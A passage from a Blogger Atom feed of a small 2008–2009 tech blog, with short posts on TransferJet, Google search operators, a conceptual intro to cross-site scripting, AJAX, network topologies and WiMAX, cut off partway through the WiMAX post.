<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8434463709749247651</id><updated>2011-04-21T19:00:40.287-07:00</updated><title type='text'>websecurities</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>13</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-8939133872630146621</id><published>2009-04-09T09:24:00.000-07:00</published><updated>2009-04-09T09:27:34.098-07:00</updated><title type='text'>Transfer JET</title><content type='html'>&lt;span style="font-weight: bold;font-size:180%;" &gt;T&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;okyo, July 17, 2008 - Sony Corporation, Canon Inc., Eastman Kodak Company, Hitachi Ltd., Victor Company of Japan, KDDI Corporation, Kenwood Corporation, Matsushita Electric Industrial Co., Ltd. 
(Panasonic), Nikon Corporation, Olympus Imaging Corporation, Pioneer Corporation, SAMSUNG ELECTRONICS CO., LTD., Seiko Epson Corporation, Sony Ericsson Mobile Communications, Toshiba Corporation today announced an agreement to form a consortium to develop specifications for interconnecting products using “TransferJet” a new interoperable wireless transfer technology that enables rapid transfer of high resolution video, music and images. The “TransferJet Consortium” (&lt;/span&gt;&lt;a style="font-weight: bold;" href="http://www.transferjet.org/"&gt;www.transferjet.org&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;) plans to promote a wide range of products and services incorporating TransferJet technology with the aim of accelerating its adoption throughout the consumer electronics industry.&lt;/span&gt;&lt;p style="font-weight: bold;"&gt;&lt;/p&gt; &lt;p style="font-weight: bold;"&gt;TransferJet wireless technology enables a high speed data transmission rate of 560Mbps, while eliminating the need for complex setup and operation. Directly touching two compliant electronic products together allows files to be transferred automatically, without the need for an access point. For example, touching a TV with a digital camera enables photos to be instantaneously displayed on the TV screen. Alternatively, downloaded music content can be easily enjoyed by touching a mobile phone to a portable audio player. Transfer Jet can be used as a universal interface across all consumer electronics devices. &lt;/p&gt;   &lt;p style="font-weight: bold;"&gt;The “TransferJet Consortium” will develop specifications and guidelines ensuring interoperability between products incorporating the technology, establish licensing schemes and administer the use of the TransferJet logo. The Consortium will also promote the advantages across industries and to consumers. Through these initiatives, the Consortium will aim to create and expand the market for TransferJet products. 
&lt;/p&gt;&lt;p style="font-weight: bold;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_o3V5vGrnHeM/Sd4hwoNxddI/AAAAAAAAAJc/JJl-oBrjiuk/s1600-h/qq.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 97px;" src="http://4.bp.blogspot.com/_o3V5vGrnHeM/Sd4hwoNxddI/AAAAAAAAAJc/JJl-oBrjiuk/s400/qq.jpg" alt="" id="BLOGGER_PHOTO_ID_5322728928911128018" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-8939133872630146621?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/8939133872630146621/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=8939133872630146621' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/8939133872630146621'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/8939133872630146621'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2009/04/transfer-jet.html' title='Transfer JET'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_o3V5vGrnHeM/Sd4hwoNxddI/AAAAAAAAAJc/JJl-oBrjiuk/s72-c/qq.jpg' height='72' 
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-6191664954058615557</id><published>2008-10-10T20:36:00.000-07:00</published><updated>2008-10-10T20:45:48.716-07:00</updated><title type='text'>Power of google query</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;span style="font-weight: bold;"&gt;Google query&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;br /&gt;The following screenshots show the power of a Google query.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_o3V5vGrnHeM/SPAhVu6FlLI/AAAAAAAAAJQ/SfhAykRqLqc/s1600-h/1.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_o3V5vGrnHeM/SPAhVu6FlLI/AAAAAAAAAJQ/SfhAykRqLqc/s400/1.bmp" alt="" id="BLOGGER_PHOTO_ID_5255737422394004658" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_o3V5vGrnHeM/SPAhATvNIGI/AAAAAAAAAJA/SZpHkyI2bro/s1600-h/2.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_o3V5vGrnHeM/SPAhATvNIGI/AAAAAAAAAJA/SZpHkyI2bro/s400/2.bmp" alt="" id="BLOGGER_PHOTO_ID_5255737054323351650" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_o3V5vGrnHeM/SPAhA2wcFwI/AAAAAAAAAJI/babF6cmT7mc/s1600-h/3.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_o3V5vGrnHeM/SPAhA2wcFwI/AAAAAAAAAJI/babF6cmT7mc/s400/3.bmp" alt="" id="BLOGGER_PHOTO_ID_5255737063723767554" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;br /&gt;Google advanced operators help refine searches.&lt;br /&gt;They are included as part of the standard Google query.&lt;br /&gt;Advanced operators use syntax such as the following:&lt;br /&gt;&lt;br /&gt;operator:search_term&lt;br /&gt;&lt;br /&gt;There’s no space between the operator, the colon, and the search term!&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;intitle&lt;/span&gt;: - search the page title&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;inurl&lt;/span&gt;: - search the URL&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;site&lt;/span&gt;: - limit results to a specific site&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;link&lt;/span&gt;: - other sites that link to our subject&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;inanchor&lt;/span&gt;: - search within hyperlinks&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;filetype&lt;/span&gt;: - starting to see a pattern yet?&lt;br /&gt;&lt;br /&gt;Advanced Operators: “filetype:”&lt;br /&gt;–filetype:extension_type&lt;br /&gt;–Find documents with the specified extension&lt;br /&gt;–The supported extensions are:&lt;br /&gt;&lt;br /&gt;HyperText Markup Language (html)&lt;br /&gt;Microsoft PowerPoint (ppt)&lt;br /&gt;Adobe Portable Document Format (pdf)&lt;br /&gt;Microsoft Word (doc)&lt;br /&gt;Adobe PostScript (ps)&lt;br /&gt;Microsoft Works (wks, wps, wdb)&lt;br /&gt;Lotus 1-2-3&lt;br /&gt;(wk1, wk2, wk3, wk4, wk5, wki, wks, wku)&lt;br /&gt;Microsoft Excel (xls)&lt;br /&gt;Microsoft Write (wri)&lt;br /&gt;Lotus WordPro (lwp)&lt;br /&gt;Rich Text Format (rtf)&lt;br /&gt;MacWrite (mw)&lt;br /&gt;Shockwave Flash (swf)&lt;br /&gt;Text (ans, txt)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-6191664954058615557?l=websecurities.blogspot.com' alt='' 
/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/6191664954058615557/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=6191664954058615557' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/6191664954058615557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/6191664954058615557'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/10/power-of-google-query.html' title='Power of google query'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_o3V5vGrnHeM/SPAhVu6FlLI/AAAAAAAAAJQ/SfhAykRqLqc/s72-c/1.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-4123484484856665138</id><published>2008-08-20T20:27:00.000-07:00</published><updated>2008-08-20T20:29:22.251-07:00</updated><title type='text'>Cross-Site Scripting</title><content type='html'>&lt;span style="color: rgb(51, 102, 255);font-size:130%;" &gt;What is XSS?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;"XSS", or cross-site scripting, is an attack on other users. It won't give you 'root' or SYSTEM access on a web server. 
It lives purely at the application level (forget about the OSI model for just a minute), so it'll get you some privileges/information about the web application. Nothing more, nothing less.&lt;/span&gt;&lt;a style="font-weight: bold;" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_o3V5vGrnHeM/SKzg52mUvHI/AAAAAAAAAFo/A3NRGpQrj6Y/s1600-h/xss.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://2.bp.blogspot.com/_o3V5vGrnHeM/SKzg52mUvHI/AAAAAAAAAFo/A3NRGpQrj6Y/s320/xss.png" alt="" id="BLOGGER_PHOTO_ID_5236807751238466674" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;br /&gt;Roughly speaking, XSS is the ability to inject HTML tags into the input of a web application. A "web application" can be many things, from a web-based e-mail client to online forums to e-shopping malls. This list is limited only by human creativity.&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;To give a very basic example, imagine a guestbook where people can discuss what they think about that very website. When viewing a guestbook, a user sees whatever previous users said about this particular website; furthermore, sometimes even HTML tags are allowed. 
Why not put your text in a red 'comic sans' font, so that your message will be noticed?&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;&lt;br /&gt;This is dangerous.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-4123484484856665138?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/4123484484856665138/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=4123484484856665138' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/4123484484856665138'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/4123484484856665138'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/08/cross-site-scripting.html' title='Cross-Site Scripting'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_o3V5vGrnHeM/SKzg52mUvHI/AAAAAAAAAFo/A3NRGpQrj6Y/s72-c/xss.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-3075986548119936586</id><published>2008-05-23T22:13:00.000-07:00</published><updated>2008-05-23T22:29:00.381-07:00</updated><title type='text'>Power of JAVASCRIPT (try this very funny)</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;br 
/&gt;&lt;span style="font-weight: bold;"&gt;1. Open Internet Explorer or Firefox.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2. Go to Google.com.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3. Click Images.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4. Type "Scooby doo" (or any other keyword).&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;5. You will get a page full of images.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;6. Then delete the URL from the address bar and type the following script.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_o3V5vGrnHeM/SDembW5U4HI/AAAAAAAAAFg/ZgyyUmqDo10/s1600-h/as.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_o3V5vGrnHeM/SDembW5U4HI/AAAAAAAAAFg/ZgyyUmqDo10/s320/as.bmp" alt="" id="BLOGGER_PHOTO_ID_5203810883382599794" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255); font-weight: bold;"&gt;I know this code is very long and complex, but unfortunately Blogger will not allow me to enter this code in the post; that's why I used a screenshot. If you really like this, please mail me (matildadarini@gmail.com) and I'll forward this code. You don't need to type it; just paste the code. :)&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;&lt;span style="color: rgb(51, 51, 255); font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Do this, it is really funny.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;7. See the magic of programming.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-3075986548119936586?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/3075986548119936586/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=3075986548119936586' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/3075986548119936586'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/3075986548119936586'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/05/power-of-javascript-try-this-very-funny.html' title='Power of JAVASCRIPT (try this very funny)'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_o3V5vGrnHeM/SDembW5U4HI/AAAAAAAAAFg/ZgyyUmqDo10/s72-c/as.bmp' height='72' width='72'/><thr:total>0</thr:total></entry>
<entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-287344841575080616</id><published>2008-04-09T19:07:00.000-07:00</published><updated>2008-04-09T19:17:29.216-07:00</updated><title type='text'>AJAX</title><content type='html'>&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;span style="color: rgb(51, 204, 0);"&gt;Asynchronous JavaScript And XML&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://en.wikipedia.org/wiki/Ajax"&gt;Ajax&lt;/a&gt; is a combination of several technologies (JavaScript, XML, HTML and CSS) for creating better, faster, and more interactive web applications.&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_o3V5vGrnHeM/R_138i-8dOI/AAAAAAAAAFI/zc9KvGLkW0Q/s1600-h/ajax.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://bp1.blogger.com/_o3V5vGrnHeM/R_138i-8dOI/AAAAAAAAAFI/zc9KvGLkW0Q/s200/ajax.png" alt="" id="BLOGGER_PHOTO_ID_5187434227867350242" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;Asynchronous JavaScript And XML means the following. Asynchronous means that when a request is sent, instead of compulsorily waiting until a response comes back, the user still continues working. 
A function which has been set up will wait for the server’s&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;response and will react to it. JavaScript makes the request to the web server and, once a response is returned, JavaScript modifies the current page using its DOM, informing the user. XML is used to wrap up the data that is received back from the web server. Ajax was made popular by Google with the introduction of Google&lt;br /&gt;Suggest and Google Maps.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;How does AJAX work?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_o3V5vGrnHeM/R_14GC-8dPI/AAAAAAAAAFQ/Rpp1s5oQfSo/s1600-h/1.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_o3V5vGrnHeM/R_14GC-8dPI/AAAAAAAAAFQ/Rpp1s5oQfSo/s200/1.JPG" alt="" id="BLOGGER_PHOTO_ID_5187434391076107506" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_o3V5vGrnHeM/R_14Ny-8dQI/AAAAAAAAAFY/ZGblLkvzLws/s1600-h/2.JPG"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://bp2.blogger.com/_o3V5vGrnHeM/R_14Ny-8dQI/AAAAAAAAAFY/ZGblLkvzLws/s200/2.JPG" alt="" id="BLOGGER_PHOTO_ID_5187434524220093698" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;Traditional web applications send a request to the web server (using the GET or POST method), wait for the server to respond, and then a new page loads with the results, which results in huge overheads. With AJAX, JavaScript communicates directly with the server, through the JavaScript XMLHttpRequest 
object, and gets a response from the server without reloading the web page.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;Advantages of AJAX&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;• &lt;span style="color: rgb(255, 0, 0);"&gt;Interactivity&lt;/span&gt;&lt;br /&gt;– Ajax applications can perform a number of tasks without having their performance limited by Internet bandwidth. This makes possible the development of interactive and graphically rich applications.&lt;br /&gt;&lt;br /&gt;• &lt;span style="color: rgb(255, 0, 0);"&gt;Portability&lt;/span&gt;&lt;br /&gt;– Ajax applications are created using existing technologies that are well implemented by all major browsers and platforms. Therefore, Ajax applications are cross-platform compliant.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;Disadvantages of AJAX&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;• &lt;span style="color: rgb(255, 0, 0);"&gt;Usability criticisms&lt;/span&gt;&lt;br /&gt;– An Ajax application might behave differently than a classical web application. 
E.g.&lt;br /&gt;&lt;br /&gt;• &lt;span style="color: rgb(255, 0, 0);"&gt;The browser’s back button is not guaranteed to take the user to the previous instance of the page&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;• &lt;span style="color: rgb(255, 0, 0);"&gt;Difficult to bookmark a particular state of the application&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;• &lt;span style="color: rgb(255, 0, 0);"&gt;Response time concerns&lt;/span&gt;&lt;br /&gt;– Without clear feedback to the user, network latency might result in a delay in the interface of the web application, something the user might not expect or understand.&lt;br /&gt;&lt;br /&gt;• &lt;span style="color: rgb(255, 0, 0);"&gt;JavaScript must be enabled&lt;/span&gt;&lt;br /&gt;– The browser should support JavaScript and it should be enabled in the browser.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.telerik.com/community/ajax-learning-resources.aspx?gclid=CN7uycW2z5ICFQNMxwodgWXBHA"&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;AJAX TUTORIAL&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-287344841575080616?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/287344841575080616/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=287344841575080616' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/287344841575080616'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/287344841575080616'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/04/ajax.html' title='AJAX'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_o3V5vGrnHeM/R_138i-8dOI/AAAAAAAAAFI/zc9KvGLkW0Q/s72-c/ajax.png' height='72' width='72'/><thr:total>0</thr:total></entry>
<entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-485742375701884872</id><published>2008-04-05T00:45:00.000-07:00</published><updated>2008-04-05T00:48:30.477-07:00</updated><title type='text'>COMMUNICATION NETWORKS</title><content type='html'>&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;br /&gt;The basic issue in &lt;a href="http://en.wikipedia.org/wiki/Communication_networks"&gt;communication networks&lt;/a&gt; is the transmission of messages to achieve a prescribed message throughput (Quantity of Service) and Quality of Service (QoS). QoS can be specified in terms of message delay, message due dates, bit error rates, packet loss, economic cost of transmission, transmission power, etc. 
Depending on QoS, the installation environment, economic considerations, and the application, one of several basic network topologies may be used.&lt;br /&gt;&lt;br /&gt;A communication network is composed of nodes, each of which&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_o3V5vGrnHeM/R_cubbQb6xI/AAAAAAAAAE4/a3hKcIiVPdo/s1600-h/1.JPG"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://bp1.blogger.com/_o3V5vGrnHeM/R_cubbQb6xI/AAAAAAAAAE4/a3hKcIiVPdo/s200/1.JPG" alt="" id="BLOGGER_PHOTO_ID_5185664544648456978" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt; has computing power and can transmit and receive messages over communication links, wireless or cabled. The basic network topologies are shown in the figure and include fully connected, mesh, star, ring, tree and bus. A single network may consist of several interconnected subnets of different topologies.&lt;br /&gt;Networks are further classified as Local Area Networks (&lt;a href="http://en.wikipedia.org/wiki/LAN"&gt;LAN&lt;/a&gt;), e.g. inside one building, or Wide Area Networks (&lt;a href="http://en.wikipedia.org/wiki/WAN"&gt;WAN&lt;/a&gt;), e.g. 
between buildings.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434463709749247651-485742375701884872?l=websecurities.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://websecurities.blogspot.com/feeds/485742375701884872/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8434463709749247651&amp;postID=485742375701884872' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/485742375701884872'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434463709749247651/posts/default/485742375701884872'/><link rel='alternate' type='text/html' href='http://websecurities.blogspot.com/2008/04/communication-networks.html' title='COMMUNICATION NETWORKS'/><author><name>MD</name><uri>http://www.blogger.com/profile/17999812140771553701</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_o3V5vGrnHeM/R_cubbQb6xI/AAAAAAAAAE4/a3hKcIiVPdo/s72-c/1.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8434463709749247651.post-7475678549919641713</id><published>2008-03-11T22:52:00.000-07:00</published><updated>2008-03-11T23:05:54.973-07:00</updated><title type='text'>WIMAX</title><content type='html'>&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;span style="color: rgb(255, 102, 102);font-size:130%;" &gt;W&lt;/span&gt;orldwide &lt;span style="color: rgb(255, 102, 102);font-size:130%;" &gt;I&lt;/span&gt;nteroperability for &lt;span style="color: rgb(255, 102, 
102);font-size:130%;" &gt;M&lt;/span&gt;icrowave &lt;span style="color: rgb(255, 102, 102);font-size:130%;" &gt;A&lt;/span&gt;ccess&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;WIMAX is a telecommunications technology aimed at providing wireless data over long distances in a variety of ways, from point-to-point links to full mobile cellular-type access. It is based on the IEEE 802.16&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_o3V5vGrnHeM/R9dwAHchejI/AAAAAAAAAEY/jjhE9sULmS4/s1600-h/wimax-logo.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://bp2.blogger.com/_o3V5vGrnHeM/R9dwAHchejI/AAAAAAAAAEY/jjhE9sULmS4/s320/wimax-logo.gif" alt="" id="BLOGGER_PHOTO_ID_5176729443986668082" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt; standard, which is also called WirelessMAN. 
